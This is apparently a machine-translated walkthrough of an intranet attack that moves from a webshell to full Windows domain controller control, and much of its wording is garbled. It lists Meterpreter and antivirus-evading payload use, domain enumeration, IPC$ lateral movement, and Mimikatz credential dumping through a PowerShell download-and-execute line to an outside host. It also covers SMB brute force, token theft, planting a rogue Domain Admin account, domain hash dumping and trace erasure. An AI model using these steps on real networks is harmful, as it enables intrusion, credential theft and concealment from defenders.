A complete exploration path from Webshell to domain control

Objective

Intranet penetration test data is basically a lot of Daniel's article tells us how to think, but for me, such as the side dishes have been foggy.

So what kind of tools to use the intranet to unimpeded, became the people have always been the desire.

Today, I am in the spirit of all the teachers to share selfless, special will be three years to master, ask sister, the artifact obtained, after finishing, key knowledge points written out.

The relevant knowledge points are summarized as follows:

• To avoid payload generation, use the Veil
• An attempt by MSF to make a right under the Meterpreter
• MSF's BYPASSUAC attempt under Meterpreter
• Information Association in the process of intranet penetration testing
• Meterpreter route additions and related scans
• Powershell used under Meterpreter
• The Meterpreter Post module uses
• The use of the MSF custom-generated payload
• Process Injection Theft Token

In fact, the focus is not on the number of knowledge, we only need to focus on the more important connection points.

Share in order to facilitate everyone in the security pulse to communicate together, learn together, progress together (together zhuangbility).

First of all, the shell was given to me, nor is it the focus of the introduction here, so ignore it here.

The environment for penetration testing is detailed as follows:

• A Fortress Machine (Webshell machine): Windows Server 2012
• B Fortress Machine: Windows (PowerShell scan machine)
• C Fortress machine: Machine with domain management process Windows Server 2012
• D Fortress Machine Several

First step rebound   Meterpreter

In fact, every penetration test is not as smooth as we thought, and this time the beginning also means

We have a different journey, the entire penetration test process I spent almost four hours, most of the time is spent on solving these problems.

1 Webshell cannot upload exe

Originally thought of directly upload meterpreter payload direct rebound results found not upload, you can choose PowerShell Meterpreter module to achieve

2 Meterpreter reverse_tcp Module rebound unsuccessful

MSF's payload rebound, just starting with the module I used was Meterpreter's reverse_tcp module to try and find can bounce, but has been unable to build a successful meterpreter,

There must be some monitoring to discover our behavior. On this basis, try to meterpreter the Reverse_https module, successfully rebound success

The detailed diagram of the problems encountered and the resolution process is as follows:

Figure 1-1 Using payload

Figure 1-2 setting up payload for HTTPS

Figure 1-3 Rebound success

The second step is to try to raise power   Windows   Server   -

What was the first thing that came to mind when we first got a webshell (under-privileged)? That is certainly the right to mention, I also want to think of the same, first began our journey of right to lift.

First, using the MSF search module MS15, you will get some exploit modules. I tried ms15_05 and ms15_078 all ended in failure.

The detailed figure is as follows:

Figure 2-1 The attempt to extract power failed

The third step is to try the current account   BypassuacTest

Just started to forget to say one thing, that is Webshell itself, we currently Webshell is JSP, with the current user of a common domain permissions.

I also thought that is not possible through the BYPASSUAC to complete the right, but the test results can be imagined, another failure.

The details of the present situation are as follows:

Figure 3-1 Current User rights

Figure 3-2 Bypassuac Try

Fourth Step related information collection

When we are not successful at this time, we can still use the current user to conduct domain penetration testing. That

We currently have the following methods to conduct penetration test domains:

1 Collect information about the domain, including all users, all computers, and related key groups.

The following commands are commonly used:

NET user/domainnet Group "Domain Computers"/domainnet Group "Domain Admins"/domain #查看域管理员net localgroup Administrator SNet View/domain

2 collect information about SQL Server, if the current bastion machine uses SQL Servers, it happens that the user is the current domain user, we can use SQLCMD information collection, and scanning attacks.

Just mentioned here, because of the length of the matter, temporarily do not do a deep layer of discussion

Based on my penetration testing experience, I've just done the simplest information gathering here, first using sqlcmd to get a list of all machines for SQL Server, the current bastion machine name, the current bastion machine's IP,

There is also net view to do simple information gathering.

The detailed figure is as follows:

Figure 4-1 SQLCMD Get information

Figure 4-2 the current machine name

Figure 4-3 net view-related machine name

Fifth step information analysis, successfully obtain a server permissions

When our information is collected, we need to start thinking about what to do next.

First let's take a look at what we currently have:

• A a domain user's process permissions, the current bastion machine is Windows Server 2012, the power failure is raised. (If we can claim success, we still cannot obtain the user's plaintext password)
• B the user name of the current bastion machine
• C the name of the same installed SQL Server machine as the current sqlcmd gets to

At present, our ideas are:

• 1 Use Meterpreter's current permissions to add routes for weak password scanning
• 2 using PowerShell to scan the internal network (this penetration test used, but here for the time being not used), specifically, a little more slowly, of course, at this moment PowerShell is definitely an intranet penetration test another artifact
• 3 Use the current user rights to set up the socks4a, and then use the first step we get to the information socks for intranet scanning
• 4 Use the current user's permissions, the computer in the domain IPC, or dir overflow (that is, dir other computer C, if the successful representation of the permission) batch test

Through the above analysis, at this time I chose the most lazy method, the current fortress machine name and net view machine name to compare, to find a very similar number of machine names, manual testing.

The current speed is also very fast, in the attempt two times when the success.

The detailed procedure is as follows:

Net use \\ip\c$

tasklist/v/S IP

Figure 5-1 Net use test succeeded

Figure 5-2 tasklist Successful execution

Sixth Step Domain Information collection

First in the fourth step has already said the domain related information collection, here does not do too much introduction, this is on the basis of the fifth step to do the relevant collection, the relevant knowledge points are as follows:

1 Domain Information collection, with the following commands:

Net Group "Domain Admins"/domainnet group/domainnet Group "domain controllers"/domainnet Group "Enterprise Admins"/dom Ain

2 ipc$ invasion, everyone related words Baidu classic ipc$ invasion

Net use \\ip\c$

Copy Bat.bat \\ip\c$ (where Bat.bat is the meterpreter of PowerShell)

Net time \\ip

at \\ip time C:\bat.bat

3 Upload catch Clear tool 64.exe (Mimikatz artifact), everyone knows.

Upload/home/64.exe c \

Shell

CD \

64.Exe

4 Viewing the details of the crawled user

Net Use Xxx/domain

5 Use Meterpreter PS to view the list of processes for the relevant user

6 Attempt to use domain token impersonation

Use Incongnito

List_token-u

Impersonate_token xxxxxx

In this penetration test, I tried all the knowledge points mentioned above, in detail as follows:

Figure 6-1 Viewing a domain tube

Figure 6-2 Viewing a domain Group

Figure 6-3 Viewing a domain controller

Figure 6-4 Viewing the Enterprise management Group

Figure 6-5 Sharing copy data

Figure 6-6 Classic ipc$

Figure 6-7 Rebound Meterpreter success

Figure 6-8 Uploading a file

Figure 6-9 Viewing server information

Figure 6-10 Crawl Password

Figure 6-11 Viewing domain user rights

Figure 6-12 Viewing domain user rights

Figure 6-13 Stealing token attempts

Figure 6-14 Viewing the primary domain-controlled IP

Seventh Step   SMBRapid expansion Control permissions

What are you thinking of as a reader at this moment? is not when you see the sixth step of the time can go to bed, after all, it is five o'clock in the morning.

But at this moment as a professional seeking master, ask the sister, God of the people do not think so.

We have to do the final sprint, because the bell of the dawn has rung.

Let's take a look at what permissions we currently have:

There are two fortress machines, two user rights

At present, what we want to do is very simple, is the rapid expansion of control in the network, then how to do, in fact, is very simple, is the rapid scanning to complete our dream.

Specific as follows:

• 1 Use the currently acquired two user rights to quickly scan. (scan where, see the sixth step of the last picture 6-14, is the domain-controlled IP segment)
• 2 Smb_login Scan
• 3 Port forwarding into intranet

Now we have the idea, the artifact MSF has finally ushered in its own dream of evil heaven. Let's play happily.

Detailed knowledge points are as follows:

• 1 MSF Add routing route add IP mask SessionID
• 2 Smb_login module or use Psexec_scanner (this module requires you to search)
• 3 Meterpreter Port forwarding
• 4 MSF socks4a module (this penetration test is not used, but does not mean it is not good)

Figure 7-1 Setting parameters for Smb_login

Fig. 7-2 The machine for blasting success

Figure 7-3 Viewing the permissions that have been acquired

Figure 7-4 Port forwarding and currently owned permissions

Eighth step   PowershellGet the domain control Administrator online Machine

Intranet penetration Testing has to say two great artifacts: MSF and PowerShell, but see that everyone is basically separate to use, or that everyone in the process of penetration testing rarely encountered, today as a reader of you blessed.

First of all, the PowerShell in the network penetration test can not only sweep, can explode, can be forwarded, of course, can do more things,

The following three modules are commonly used:

• 1 Empire is said to be an artifact, it is indeed an artifact, I have not used, for the moment not much to say
• 2 PowerUp is said to mention the right artifact, is indeed an artifact, I seldom use. And for the moment, not much.
• 3 PowerView is said to be a domain penetration artifact, is indeed an artifact, I have been using, very beautiful

To say that the use of PowerShell, in fact, is very simple, but everyone in the process of using generally not too much attention,

There are three main ways to invoke:

1 is of course downloaded to local execution, detailed using methods such as the following connection: PowerShell "IEX (new-objectnet.webclient). Downloadstring (' Http://is.gd/oeoFuI '); Invoke-mimikatz-dumpcreds "

2 The second way is to upload PowerShell files to the Fortress machine local execution, Powershell.exe-exec Bypass-command "& {import-module. \powerview.ps1; Invoke-userhunter} "

3 upload to each other locally, and then import-module import, using all modules of Powerview is actually very simple, call the method directly, we look at the following diagram to know.

If you can see the start of your PowerShell journey here, the intranet will start to become simple.

Figure 8-1 Method of Powerview

Nonsense said so much, the following start our actual combat, in fact, very simple, I really want to say very simple, simple to a sentence to fix.

The Invoke-userhunter in Powerview is the machine that gets the current domain administrator to log on online.

We'll use it for further information on this journey. Details such as:

Figure 8-1 PowerShell execution command

Figure 8-2 Powerview Effect Show

Nineth Step domain Control administrator access (windows2012Permissions )

After the eighth step, as a reader you are not feeling a little bit of this harvest, intranet penetration test is not so helpless.

Artifact after the artifact, and see it Windows Server 2012, although the domain management online, but our grasp password artifact impotence, can not modify the registry, and so the administrator login again.

Now look at the problem we have, through PowerShell successfully get to the relevant domain control administrator online a machine Windows Server 2012, and with this machine permissions, then we go to take care of domain control.

Ideas are as follows:

• 1 Modify the registry wait for the domain administrator to log in again to crawl (the lily will be cool)
• 2 through the PowerUp process to inject Get domain permissions (no use of temporary abandonment), of course, here can also write plug-like function injection process to get permissions
• 3 MSF's token-stealing feature (this can be easily implemented)

Know the idea, then let's start our happy journey. I ask master, ask sister, Seek artifact, professional to seek domain control to:

1 also using IPC classic intrusion techniques, rebound meterpreter,

Getsysttem Permissions

Ps view the process in which domain management resides

Migrate PID Injection Process

2 continuation of classic ipc$ to domain control

Meterpreter Shell Below

Net use \ \ domain control ip\c$

Net time \ \ domain-controlled IP

Copy bat.bat \ \ domain control ip\c$

at \ \ domain-controlled IP time c:\bat.bat (unexpected error, hint Schtasks.exe, not cooked) { Safety Pulse Small Note: 08 and above at the command is discarded, all with schtasks scheduled tasks}

3 The path to success is more than one, add a domain pipe account

Net User Demo Demo/ad/domain

Net Group "Domain Admins" demo/ad/domain

At this point, we already have domain control permissions.

The details are as follows:

Figure 9-1 Injecting the domain tube process, connecting the domain control

Figure 9-2 Adding a Domain Admin account

Figure 9-3 See if Domain management is successful

Tenth step domain control I'm coming. (MSF   PsExecRebound   Shell)

A look at the time, seven o'clock in the morning, the morning sun will rise up. What is your mood at the moment? It's time to run the morning. The East Sun is about to rise, the domain control of the authority has finally arrived.

First of all, there are many ways to log in to the domain control, the following I say I can know a few of it, I believe we also all know:

• 1 port forwarding or SOCKS logon domain Remote Desktop
• 2 Login to a computer in the other intranet use PsExec to bounce shell
• 3 using the MSF psexec rebound Meterpreter

Rebound needs to be aware of the knowledge to be used, we are using PSESEXC to rebound Meterpreter, which involves the following knowledge:

• 1 use of the PsExec module in MSF
• 2 Custom module use, with Meterpreter, in the case of payload inevitably kill how to use their own veil generated payload

Detailed use of the process such as:

Figure 10-1 PsExec performing the test

Figure 10-2 PsExec default Bounce not successful

Figure 10-3 Meterpreter's HTTPS module bounces successfully

Figure 10-4 Domain-controlled system Information

11th Step   MeterpreterGet all users '   Hash

With domain permissions, Dumphash is essential if we want to have a deep level of control.

First take a look at the knowledge we need:

• 1 MSF has two modules can be used, one is Hashdump, this module can only export local hash, you can know the test, and the other is Smart_hashdump, this module can be used to export the domain user's hash.
• 2 PowerShell There are modules that can be exported directly, let's try it yourself
• 3 use of Wce,mimikatz and other artifacts

Here I am using the Smart_hashdump module of MSF. It is important to note that in order to export the hash using this module, you must use the permissions of the system.

The detailed process is as follows:

Figure 11-1 Use of the Smart_hashdump module

The 12th step of the tortuous path of exploration

Here are some of the techniques used before, and some detours. Document it's almost done.

A journey from Webshell to domain control is completed, of course, here I take some detours in the process and points out, welcome everyone to correct, learn together.

Figure 12-1 Session Control chart

According to the above figure, I now control the Session total of 5, of which four are to be obtained, respectively, Session1,session2 session4,session5.

Where Session1 is obtained by Webshell rebound, the second session2 is information analysis obtained, session4 to get domain administrator acquired, session5 for the domain.

One of the Session3 is the detour I have been through, wasting time.

After that we have to complete the penetration test in order to better and more quickly and effectively, we usually try to practice the sword. Try to do not out of the sword is already, out of the sword see blood.

The 13th step I gently came, I walked softly, the Administrator, goodbye (Clean )

As a more successful friendship test, we have to do without shadow, go without a trace. So the finishing touches will also unfold quietly.

Relevant knowledge points are involved:

• 1 Delete the previously added Domain Admin account
• 2 Remove all tools used in the process
• 3 Delete all of your operation Records
• 4 Close all Meterpreter

In this process, we uploaded two files, a bar.bat, a 64-bit Mimikatz grab password tool,

You can delete it directly.

Figure 13-1 Deleting a user

Figure 13-2 Closing the session

Summarize

Sum up and say something good. or shout the slogan first------"Beg sister, Master, seek artifact".

Thank you for more than three years for my silently share of the teachers, thank the sister in I do this friendship test, she has been quietly accompany my side,

Thank you for all these years of the various artifacts, without the support of these resources, I will not complete this friendship test.

As a penetration testing enthusiasts, we have been striving to pursue the heart of that beautiful dream;

As a programmer, we simply want to coding. Life is so beautiful, why don't we join together and share the good.

Directory

Domain Penetration Testing Tutorial (Windows Server 2012) ............................................................................................ 1

Objective.......................................................................................................................  ...................... 2

First step rebound Meterpreter .......................................................................................................... 2

The second step is to try to power Windows Server 2012 .... ..... ..... ..... ............ ....... ..... .................. ......... 4

The third step is to try the current account Bypassuac test ....... ..... ............... ....... ..... .................. ......... 5

Fourth Step related information collection ............................................................................................................... 6

Fifth step information analysis, successfully getting a server right ... ..... ... .... ... .... ... ..... ..... .... ..... ..... .............................. 8

Sixth Step Domain Information collection ................................................................................................................. 10

Seventh step SMB Rapid expansion control permissions ...... ..... ..... .................... ..... ..... ..... ..... ..... .............. .......... 16

The eighth step Powershell gets the domain control administrator online ..... ... ... ..... ... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ..... ... and ..... ..... 18

Nineth Step Domain Control admin access (windows2012 permissions) ..... ..... ... ..... ..... ..... ..... ..... ..... ..... ..... .............. 20

Tenth step domain Control I'm here (MSF psexec rebound shell) ..... ..... .............. ....... ..... ....................... 22

The 11th step Meterpreter to get all the user's hash ......... ........... ....................... ........ 24

The 12th step of the tortuous path of exploration ..................................................................................................... 25

The 13th step I gently came, and I walked softly, the Administrator, Goodbye (Clean) ........ .................. 26

Summarize.......................................................................................................................  .................... 27

A complete exploration path from Webshell to domain control